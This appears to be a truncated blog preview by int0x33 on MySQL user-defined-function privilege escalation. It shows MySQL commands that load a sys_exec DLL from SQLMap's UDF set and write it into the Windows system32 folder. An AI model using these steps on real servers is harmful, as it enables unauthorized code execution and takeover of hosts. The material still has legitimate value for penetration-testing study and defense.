MySql User-Defined Function (UDF) Privilege Escalation (Windows & Linux)
Blog iconint0x33
Nov 17
We will get into making our own functions in later posts but for now, the UDF compiled shared objects from SQLMap are great. https://github.com/int0x33/sqlmap/tree/master/udf/mysqlWindows Escalationmysql> USE mysql; mysql> CREATE TABLE pwn(line blob); mysql> INSERT INTO pwn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll')); mysql> SELECT * FROM mysql.pwn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll'; mysql> CREATE FUNCTION sys_exec RETURNS integer SONAME ...

Most popular by int0x33

MySql User-Defined Function (UDF) Privilege Escalation (Windows & Linux)

MySql User-Defined Function (UDF) Privilege Escalation (Windows & Linux)

int0x33

Written by
int0x33
Subscribe

2025 Paragraph Technologies Inc

PopularTrendingPrivacyTermsHome
Search...Ctrl+K

int0x33

Subscribe